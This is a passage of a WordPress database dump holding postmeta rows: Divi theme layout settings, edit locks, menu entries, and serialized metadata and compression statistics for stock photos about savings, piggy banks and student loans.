','3'),(1122,333,'_edit_lock','1679248235:3'),(1125,333,'_et_post_bg_color','#ffffff'),(1126,333,'_et_post_bg_layout','light'),(1127,333,'_et_pb_show_title','on'),(1128,333,'_et_pb_post_hide_nav','default'),(1129,333,'_et_pb_page_layout','et_right_sidebar'),(1130,333,'_et_pb_side_nav','off'),(1147,333,'_et_pb_use_builder',''),(1148,333,'_et_pb_first_image',''),(1149,333,'_et_pb_truncate_post',''),(1150,333,'_et_pb_truncate_post_date',''),(1151,333,'_et_pb_old_content',''),(1154,343,'_thumbnail_id','305'),(1153,343,'_edit_last','3'),(1152,343,'_edit_lock','1679248120:3'),(1155,343,'_et_post_bg_color','#ffffff'),(1156,343,'_et_post_bg_layout','light'),(1157,343,'_et_pb_show_title','on'),(1158,343,'_et_pb_post_hide_nav','default'),(1159,343,'_et_pb_page_layout','et_right_sidebar'),(1160,343,'_et_pb_side_nav','off'),(1164,343,'_et_pb_use_builder',''),(1165,343,'_et_pb_first_image',''),(1166,343,'_et_pb_truncate_post',''),(1167,343,'_et_pb_truncate_post_date',''),(1168,343,'_et_pb_old_content',''),(1191,350,'_edit_lock','1678808711:3'),(1192,350,'_edit_last','3'),(1193,350,'_wp_page_template','default'),(1194,350,'_et_pb_post_hide_nav','default'),(1195,350,'_et_pb_page_layout','et_right_sidebar'),(1196,350,'_et_pb_side_nav','off'),(1197,350,'_et_pb_use_builder',''),(1198,350,'_et_pb_first_image',''),(1199,350,'_et_pb_truncate_post',''),(1200,350,'_et_pb_truncate_post_date',''),(1201,350,'_et_pb_old_content',''),(1484,420,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:666;s:4:\"file\";s:65:\"2023/03/Savings-and-budget-concept-with-piggy-bank-1000x666-1.jpg\";s:8:\"filesize\";i:194602;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:65:\"Savings-and-budget-concept-with-piggy-bank-1000x666-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28376;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:65:\"Savings-and-budget-concept-with-piggy-bank-1000x666-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25875;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"Savings-and-budget-concept-with-piggy-bank-1000x666-1-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49495;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:65:\"Savings-and-budget-concept-with-piggy-bank-1000x666-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31986;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:65:\"Savings-and-budget-concept-with-piggy-bank-1000x666-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32851;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:65:\"Savings-and-budget-concept-with-piggy-bank-1000x666-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39250;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:65:\"Savings-and-budget-concept-with-piggy-bank-1000x666-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46580;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:65:\"Savings-and-budget-concept-with-piggy-bank-1000x666-1-980x653.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:653;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61520;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:65:\"Savings-and-budget-concept-with-piggy-bank-1000x666-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35097;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:32:\"Proxima Studio - stock.adobe.com\";s:6:\"camera\";s:10:\"NIKON D750\";s:7:\"caption\";s:73:\"Piggy bank and calculator on white background. Savings and budget concept\";s:17:\"created_timestamp\";s:10:\"1557752034\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"58\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:42:\"Savings and budget concept with piggy bank\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:50:{i:0;s:6:\"budget\";i:1;s:10:\"calculator\";i:2;s:7:\"savings\";i:3;s:5:\"piggy\";i:4;s:4:\"bank\";i:5;s:4:\"pink\";i:6;s:9:\"piggybank\";i:7;s:7:\"deposit\";i:8;s:10:\"retirement\";i:9;s:4:\"safe\";i:10;s:7:\"account\";i:11;s:8:\"analysis\";i:12;s:9:\"analyzing\";i:13;s:7:\"balance\";i:14;s:7:\"banking\";i:15;s:5:\"bills\";i:16;s:9:\"budgeting\";i:17;s:8:\"business\";i:18;s:9:\"calculate\";i:19;s:8:\"isolated\";i:20;s:5:\"white\";i:21;s:8:\"commerce\";i:22;s:7:\"compute\";i:23;s:6:\"credit\";i:24;s:7:\"economy\";i:25;s:7:\"finance\";i:26;s:9:\"financial\";i:27;s:4:\"fund\";i:28;s:6:\"income\";i:29;s:6:\"invest\";i:30;s:9:\"investing\";i:31;s:10:\"investment\";i:32;s:5:\"money\";i:33;s:8:\"mortgage\";i:34;s:6:\"nobody\";i:35;s:3:\"pig\";i:36;s:8:\"planning\";i:37;s:6:\"profit\";i:38;s:4:\"save\";i:39;s:6:\"wealth\";i:40;s:10:\"accounting\";i:41;s:11:\"calculation\";i:42;s:7:\"closeup\";i:43;s:7:\"concept\";i:44;s:10:\"eyeglasses\";i:45;s:7:\"glasses\";i:46;s:7:\"payment\";i:47;s:6:\"secure\";i:48;s:8:\"security\";i:49;s:10:\"spectacles\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"89\";s:8:\"quantity\";d:100;s:4:\"webp\";i:0;}}'),(1424,80,'_et_pb_truncate_post_date',''),(1425,80,'_et_pb_old_content',''),(1423,80,'_et_pb_truncate_post',''),(1478,416,'_et_pb_truncate_post',''),(1479,416,'_et_pb_truncate_post_date',''),(1480,416,'_et_pb_old_content',''),(1481,419,'_edit_lock','1679404247:3'),(1482,419,'_edit_last','3'),(1170,345,'_edit_lock','1679248136:3'),(1171,345,'_edit_last','3'),(1172,345,'_thumbnail_id','257'),(1173,345,'_et_post_bg_color','#ffffff'),(1174,345,'_et_post_bg_layout','light'),(1175,345,'_et_pb_show_title','on'),(1176,345,'_et_pb_post_hide_nav','default'),(1177,345,'_et_pb_page_layout','et_right_sidebar'),(1178,345,'_et_pb_side_nav','off'),(1182,345,'_et_pb_use_builder',''),(1183,345,'_et_pb_first_image',''),(1184,345,'_et_pb_truncate_post',''),(1185,345,'_et_pb_truncate_post_date',''),(1186,345,'_et_pb_old_content',''),(1369,54,'_et_pb_old_content',''),(1365,54,'_et_pb_use_builder',''),(1366,54,'_et_pb_first_image',''),(1367,54,'_et_pb_truncate_post',''),(1368,54,'_et_pb_truncate_post_date',''),(1400,71,'_et_pb_use_builder',''),(1401,71,'_et_pb_first_image',''),(1402,71,'_et_pb_truncate_post',''),(1403,71,'_et_pb_truncate_post_date',''),(1404,71,'_et_pb_old_content',''),(1407,74,'_et_pb_use_builder',''),(1408,74,'_et_pb_first_image',''),(1483,420,'_wp_attached_file','2023/03/Savings-and-budget-concept-with-piggy-bank-1000x666-1.jpg'),(1472,416,'_et_pb_page_layout','et_right_sidebar'),(1473,416,'_et_pb_side_nav','off'),(1332,138,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(1465,416,'_edit_lock','1679403716:3'),(1466,416,'_edit_last','3'),(1652,464,'_imagify_status','success'),(1653,464,'_imagify_data','a:2:{s:5:\"sizes\";a:20:{s:4:\"full\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:367047;s:14:\"optimized_size\";i:107508;s:7:\"percent\";d:70.7099999999999937472239253111183643341064453125;}s:43:\"et-pb-image--responsive--phone@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:53143;s:14:\"optimized_size\";i:15326;s:7:\"percent\";d:71.159999999999996589394868351519107818603515625;}s:44:\"et-pb-image--responsive--tablet@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:111582;s:14:\"optimized_size\";i:35714;s:7:\"percent\";d:67.9899999999999948840923025272786617279052734375;}s:48:\"et-pb-gallery-module-image-portrait@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:61458;s:14:\"optimized_size\";i:18422;s:7:\"percent\";d:70.030000000000001136868377216160297393798828125;}s:41:\"et-pb-portfolio-module-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:59869;s:14:\"optimized_size\";i:17724;s:7:\"percent\";d:70.400000000000005684341886080801486968994140625;}s:34:\"et-pb-portfolio-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:47607;s:14:\"optimized_size\";i:12850;s:7:\"percent\";d:73.0100000000000051159076974727213382720947265625;}s:34:\"et-pb-post-main-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:44963;s:14:\"optimized_size\";i:11782;s:7:\"percent\";d:73.7999999999999971578290569595992565155029296875;}s:25:\"medium_large@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:83834;s:14:\"optimized_size\";i:26106;s:7:\"percent\";d:68.8599999999999994315658113919198513031005859375;}s:22:\"thumbnail@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:31540;s:14:\"optimized_size\";i:6516;s:7:\"percent\";d:79.340000000000003410605131648480892181396484375;}s:19:\"medium@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:38467;s:14:\"optimized_size\";i:9488;s:7:\"percent\";d:75.3299999999999982946974341757595539093017578125;}s:17:\"full@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:367047;s:14:\"optimized_size\";i:39884;s:7:\"percent\";d:89.1299999999999954525264911353588104248046875;}s:6:\"medium\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:38467;s:14:\"optimized_size\";i:31662;s:7:\"percent\";d:17.690000000000001278976924368180334568023681640625;}s:9:\"thumbnail\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:31540;s:14:\"optimized_size\";i:28585;s:7:\"percent\";d:9.3699999999999992184029906638897955417633056640625;}s:12:\"medium_large\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:83834;s:14:\"optimized_size\";i:46812;s:7:\"percent\";d:44.159999999999996589394868351519107818603515625;}s:21:\"et-pb-post-main-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:44963;s:14:\"optimized_size\";i:34459;s:7:\"percent\";d:23.3599999999999994315658113919198513031005859375;}s:21:\"et-pb-portfolio-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:47607;s:14:\"optimized_size\";i:35634;s:7:\"percent\";d:25.14999999999999857891452847979962825775146484375;}s:28:\"et-pb-portfolio-module-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:59869;s:14:\"optimized_size\";i:40454;s:7:\"percent\";d:32.42999999999999971578290569595992565155029296875;}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:61458;s:14:\"optimized_size\";i:41157;s:7:\"percent\";d:33.030000000000001136868377216160297393798828125;}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:111582;s:14:\"optimized_size\";i:67808;s:7:\"percent\";d:39.22999999999999687361196265555918216705322265625;}s:30:\"et-pb-image--responsive--phone\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:53143;s:14:\"optimized_size\";i:37605;s:7:\"percent\";d:29.239999999999998436805981327779591083526611328125;}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:1799020;s:14:\"optimized_size\";i:665496;s:7:\"percent\";d:63.00999999999999801048033987171947956085205078125;}}'),(1648,467,'_imagify_optimization_level','2'),(1649,467,'_imagify_status','success'),(1650,467,'_imagify_data','a:2:{s:5:\"sizes\";a:34:{s:4:\"full\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:445726;s:14:\"optimized_size\";i:346177;s:7:\"percent\";d:22.3299999999999982946974341757595539093017578125;}s:43:\"et-pb-image--responsive--phone@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:39741;s:14:\"optimized_size\";i:16178;s:7:\"percent\";d:59.28999999999999914734871708787977695465087890625;}s:44:\"et-pb-image--responsive--tablet@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:91840;s:14:\"optimized_size\";i:47792;s:7:\"percent\";d:47.96000000000000085265128291212022304534912109375;}s:45:\"et-pb-image--responsive--desktop@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:137732;s:14:\"optimized_size\";i:74106;s:7:\"percent\";d:46.2000000000000028421709430404007434844970703125;}s:50:\"et-pb-post-main-image-fullwidth-large@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:812539;s:14:\"optimized_size\";i:474384;s:7:\"percent\";d:41.61999999999999744204615126363933086395263671875;}s:48:\"et-pb-gallery-module-image-portrait@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:57765;s:14:\"optimized_size\";i:31912;s:7:\"percent\";d:44.75999999999999801048033987171947956085205078125;}s:41:\"et-pb-portfolio-image-single@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:105648;s:14:\"optimized_size\";i:56012;s:7:\"percent\";d:46.97999999999999687361196265555918216705322265625;}s:41:\"et-pb-portfolio-module-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:56717;s:14:\"optimized_size\";i:29102;s:7:\"percent\";d:48.68999999999999772626324556767940521240234375;}s:34:\"et-pb-portfolio-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:42494;s:14:\"optimized_size\";i:19616;s:7:\"percent\";d:53.840000000000003410605131648480892181396484375;}s:44:\"et-pb-post-main-image-fullwidth@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:147517;s:14:\"optimized_size\";i:87218;s:7:\"percent\";d:40.88000000000000255795384873636066913604736328125;}s:34:\"et-pb-post-main-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:40185;s:14:\"optimized_size\";i:16904;s:7:\"percent\";d:57.92999999999999971578290569595992565155029296875;}s:22:\"2048x2048@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:300644;s:14:\"optimized_size\";i:167436;s:7:\"percent\";d:44.31000000000000227373675443232059478759765625;}s:22:\"1536x1536@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:185802;s:14:\"optimized_size\";i:102166;s:7:\"percent\";d:45.00999999999999801048033987171947956085205078125;}s:25:\"medium_large@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:66253;s:14:\"optimized_size\";i:31676;s:7:\"percent\";d:52.18999999999999772626324556767940521240234375;}s:22:\"thumbnail@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:25608;s:14:\"optimized_size\";i:6384;s:7:\"percent\";d:75.06999999999999317878973670303821563720703125;}s:18:\"large@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:98172;s:14:\"optimized_size\";i:51842;s:7:\"percent\";d:47.18999999999999772626324556767940521240234375;}s:19:\"medium@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:28966;s:14:\"optimized_size\";i:8502;s:7:\"percent\";d:70.650000000000005684341886080801486968994140625;}s:17:\"full@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:451770;s:14:\"optimized_size\";i:249882;s:7:\"percent\";d:44.68999999999999772626324556767940521240234375;}s:6:\"medium\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:28966;s:14:\"optimized_size\";i:7085;s:7:\"percent\";d:75.5400000000000062527760746888816356658935546875;}s:5:\"large\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:98172;s:14:\"optimized_size\";i:64736;s:7:\"percent\";d:34.06000000000000227373675443232059478759765625;}s:9:\"thumbnail\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:25608;s:14:\"optimized_size\";i:4386;s:7:\"percent\";d:82.8700000000000045474735088646411895751953125;}s:12:\"medium_large\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:66253;s:14:\"optimized_size\";i:38168;s:7:\"percent\";d:42.3900000000000005684341886080801486968994140625;}s:9:\"1536x1536\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:185802;s:14:\"optimized_size\";i:135460;s:7:\"percent\";d:27.089999999999999857891452847979962825775146484375;}s:9:\"2048x2048\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:300644;s:14:\"optimized_size\";i:228837;s:7:\"percent\";d:23.879999999999999005240169935859739780426025390625;}s:21:\"et-pb-post-main-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:40185;s:14:\"optimized_size\";i:16540;s:7:\"percent\";d:58.840000000000003410605131648480892181396484375;}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:147517;s:14:\"optimized_size\";i:103866;s:7:\"percent\";d:29.589999999999999857891452847979962825775146484375;}s:21:\"et-pb-portfolio-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:42494;s:14:\"optimized_size\";i:18470;s:7:\"percent\";d:56.53999999999999914734871708787977695465087890625;}s:28:\"et-pb-portfolio-module-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:56717;s:14:\"optimized_size\";i:30182;s:7:\"percent\";d:46.780000000000001136868377216160297393798828125;}s:28:\"et-pb-portfolio-image-single\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:105648;s:14:\"optimized_size\";i:70811;s:7:\"percent\";d:32.969999999999998863131622783839702606201171875;}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:57765;s:14:\"optimized_size\";i:30955;s:7:\"percent\";d:46.409999999999996589394868351519107818603515625;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:812539;s:14:\"optimized_size\";i:596713;s:7:\"percent\";d:26.559999999999998721023075631819665431976318359375;}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:137732;s:14:\"optimized_size\";i:96396;s:7:\"percent\";d:30.010000000000001563194018672220408916473388671875;}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:91840;s:14:\"optimized_size\";i:59412;s:7:\"percent\";d:35.31000000000000227373675443232059478759765625;}s:30:\"et-pb-image--responsive--phone\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:39741;s:14:\"optimized_size\";i:16092;s:7:\"percent\";d:59.50999999999999801048033987171947956085205078125;}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:5372742;s:14:\"optimized_size\";i:3335398;s:7:\"percent\";d:37.9200000000000017053025658242404460906982421875;}}'),(1651,464,'_imagify_optimization_level','2'),(1315,384,'_menu_item_type','post_type'),(1316,384,'_menu_item_menu_item_parent','0'),(1317,384,'_menu_item_object_id','138'),(1318,384,'_menu_item_object','page'),(1319,384,'_menu_item_target',''),(1320,384,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1297,138,'_et_pb_show_page_creation','off'),(1321,384,'_menu_item_xfn',''),(1322,384,'_menu_item_url',''),(1467,416,'_thumbnail_id','281'),(1410,74,'_et_pb_truncate_post_date',''),(1409,74,'_et_pb_truncate_post',''),(1379,61,'_et_pb_use_builder',''),(1380,61,'_et_pb_first_image',''),(1381,61,'_et_pb_truncate_post',''),(1382,61,'_et_pb_truncate_post_date',''),(1383,61,'_et_pb_old_content',''),(1422,80,'_et_pb_first_image',''),(1418,77,'_et_pb_old_content',''),(1421,80,'_et_pb_use_builder',''),(1386,65,'_et_pb_use_builder',''),(1387,65,'_et_pb_first_image',''),(1388,65,'_et_pb_truncate_post',''),(1389,65,'_et_pb_truncate_post_date',''),(1390,65,'_et_pb_old_content',''),(1417,77,'_et_pb_truncate_post_date',''),(1415,77,'_et_pb_first_image',''),(1416,77,'_et_pb_truncate_post',''),(1393,68,'_et_pb_use_builder',''),(1394,68,'_et_pb_first_image',''),(1395,68,'_et_pb_truncate_post',''),(1396,68,'_et_pb_truncate_post_date',''),(1397,68,'_et_pb_old_content',''),(1411,74,'_et_pb_old_content',''),(1414,77,'_et_pb_use_builder',''),(1485,419,'_thumbnail_id','420'),(1486,419,'_et_post_bg_color','#ffffff'),(1487,419,'_et_post_bg_layout','light'),(1488,419,'_et_pb_show_title','on'),(1489,419,'_et_pb_post_hide_nav','default'),(1490,419,'_et_pb_page_layout','et_right_sidebar'),(1491,419,'_et_pb_side_nav','off'),(1493,419,'_et_pb_use_builder',''),(1494,419,'_et_pb_first_image',''),(1495,419,'_et_pb_truncate_post',''),(1496,419,'_et_pb_truncate_post_date',''),(1497,419,'_et_pb_old_content',''),(1498,422,'_edit_lock','1679404757:3'),(1499,422,'_edit_last','3'),(1500,423,'_wp_attached_file','2023/03/saving-money-piggybank-1000x667-1.jpg'),(1501,423,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:45:\"2023/03/saving-money-piggybank-1000x667-1.jpg\";s:8:\"filesize\";i:460922;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"saving-money-piggybank-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28205;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"saving-money-piggybank-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21360;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"saving-money-piggybank-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79084;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:45:\"saving-money-piggybank-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35016;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:45:\"saving-money-piggybank-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38083;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:45:\"saving-money-piggybank-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51250;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:45:\"saving-money-piggybank-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53773;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:45:\"saving-money-piggybank-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112695;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:45:\"saving-money-piggybank-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43845;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"11\";s:6:\"credit\";s:14:\"David Franklin\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:60:\"Female hand putting a one dollar bill into a pink piggy bank\";s:17:\"created_timestamp\";s:10:\"1303186665\";s:9:\"copyright\";s:22:\"© 2011 David Franklin\";s:12:\"focal_length\";s:2:\"60\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:18:\"Piggy Bank savings\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:56:{i:0;s:8:\"american\";i:1;s:10:\"background\";i:2;s:4:\"bank\";i:3;s:7:\"banking\";i:4;s:8:\"banknote\";i:5;s:4:\"bill\";i:6;s:4:\"blue\";i:7;s:8:\"business\";i:8;s:7:\"concept\";i:9;s:4:\"copy\";i:10;s:10:\"copy space\";i:11;s:9:\"copyspace\";i:12;s:8:\"currency\";i:13;s:6:\"dollar\";i:14;s:5:\"field\";i:15;s:7:\"finance\";i:16;s:5:\"front\";i:17;s:10:\"front view\";i:18;s:5:\"grass\";i:19;s:5:\"green\";i:20;s:6:\"growth\";i:21;s:4:\"hand\";i:22;s:7:\"holding\";i:23;s:7:\"holiday\";i:24;s:10:\"investment\";i:25;s:4:\"line\";i:26;s:6:\"meadow\";i:27;s:5:\"money\";i:28;s:3:\"one\";i:29;s:8:\"outdoors\";i:30;s:5:\"paper\";i:31;s:7:\"pension\";i:32;s:12:\"pension fund\";i:33;s:5:\"photo\";i:34;s:5:\"piggy\";i:35;s:10:\"piggy bank\";i:36;s:9:\"piggybank\";i:37;s:4:\"pink\";i:38;s:7:\"putting\";i:39;s:10:\"retirement\";i:40;s:3:\"row\";i:41;s:4:\"save\";i:42;s:6:\"saving\";i:43;s:7:\"savings\";i:44;s:3:\"sky\";i:45;s:5:\"space\";i:46;s:7:\"success\";i:47;s:6:\"summer\";i:48;s:5:\"three\";i:49;s:2:\"US\";i:50;s:9:\"us dollar\";i:51;s:8:\"vacation\";i:52;s:6:\"wealth\";i:53;s:6:\"wisdom\";i:54;s:4:\"plan\";i:55;s:8:\"planning\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"79\";s:8:\"quantity\";d:90;s:4:\"webp\";i:0;}}'),(1502,422,'_thumbnail_id','423'),(1503,422,'_et_post_bg_color','#ffffff'),(1504,422,'_et_post_bg_layout','light'),(1505,422,'_et_pb_show_title','on'),(1506,422,'_et_pb_post_hide_nav','default'),(1507,422,'_et_pb_page_layout','et_right_sidebar'),(1508,422,'_et_pb_side_nav','off'),(1511,422,'_et_pb_use_builder',''),(1512,422,'_et_pb_first_image',''),(1513,422,'_et_pb_truncate_post',''),(1514,422,'_et_pb_truncate_post_date',''),(1515,422,'_et_pb_old_content',''),(1516,426,'_edit_lock','1679405531:3'),(1517,426,'_edit_last','3'),(1518,427,'_wp_attached_file','2023/03/Student-Loan-Money-Debt-Education-1000x667-1.jpg'),(1519,427,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:56:\"2023/03/Student-Loan-Money-Debt-Education-1000x667-1.jpg\";s:8:\"filesize\";i:416133;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:56:\"Student-Loan-Money-Debt-Education-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29931;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:56:\"Student-Loan-Money-Debt-Education-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22341;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:56:\"Student-Loan-Money-Debt-Education-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76210;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:56:\"Student-Loan-Money-Debt-Education-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36795;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:56:\"Student-Loan-Money-Debt-Education-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38495;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:56:\"Student-Loan-Money-Debt-Education-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10